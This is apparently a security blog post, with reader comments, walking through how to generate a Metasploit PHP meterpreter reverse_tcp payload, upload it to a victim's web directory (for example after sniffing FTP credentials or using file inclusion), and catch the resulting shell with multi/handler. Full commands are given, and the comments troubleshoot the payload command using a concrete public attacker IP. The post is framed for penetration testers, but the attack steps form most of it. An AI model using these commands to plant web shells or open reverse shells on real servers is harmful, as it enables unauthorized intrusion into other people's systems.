Today I’ll be showing a new feature that has just been added to the Metasploit framework.
http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html
When one can upload files to a www directory and want further leverage on the system, they may want to do this via PHP in some way. PHP shells are a viable solution for this problem, if certain parameters are met.
One parameter that must be met, is that the server must allow system commands through PHP. If the server permits system commands through PHP, then a PHP shell will be a great tool for further assessment and possible privilege escalation.
If you surf around on the internet looking for PHP shells, you’ll find ones such as: c99.php, DXshell.php. Honestly, check out: php-shell.org
Now as part of the Metasploit framework, pentesters can now use meterpreter as a php payload. I will run through a quick example of how to create a meterpreter php payload and how to execute it:
msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > mypayload.php
With this file you can use it on the web server to get a reverse connection. Hopefully, you have gained some sort of write access to the www directory on the victim’s website. (For example, if you were to sniff / capture ftp credentials to the victim’s website). Other scenarios for gaining access to the system, may include local or remote file inclusion.
On the attacker’s end all you have to do is setup msfconsole and use the multi/handler. The following commands should be issued:
msf >use multi/handler
msf >set PAYLOAD php/meterpreter/reverse_tcp
msf >set LHOST 127.0.0.1
msf >set LPORT 4444
msf >exploit -z -j
All the attacker needs to do now, is simply visit to page http://victim.com/mypayload.php and ideally the attacker should be able to get a meterpreter session.
More to come as usual…
Looks like I just found a Friday project to play with, thank you my friend. =)
I’m looking forward to the next features that will be added to this. 😛 Thanks for the comment.
[*] exec: ruby msfplayload php/meterpreter/reverse_tcp LHOST=197.128.161.68 LPOR
T=4444 R > d:\mypayload.php
ruby: No such file or directory — msfplayload (LoadError)
msf >
it’s not working with me i am using metasploit in windows 7 file was created d:\mypayload.php but it is empty
Thank you for your inquiry. Try doing this instead:
[*] exec: ruby msfplayload php/meterpreter/reverse_tcp LHOST=197.128.161.68 LPOR
T=4444 R > C:\mypayload.php
Or even:
[*] exec: ruby msfplayload php/meterpreter/reverse_tcp LHOST=197.128.161.68 LPOR
T=4444 R > mypayload.php
Let me know if that works or if you need anymore help.
However, I should note that I don’t typically use the Metasploit framework on Windows. If you’re willing to, you should look into VirtualBox and running a Linux distro under a virtual machine.
http://www.virtualbox.org/
try msfpayload, not msfplayload
Lol Good catch! 🙂
The Metasploit megaprimer has been re-created with the latest advances and also with a certification: http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/ Testimonials look good.
I just like the helpful info you provide in your articles.
I will bookmark your weblog and test again right here frequently.
I’m somewhat sure I will learn plenty of new stuff right right here! Good luck for the next!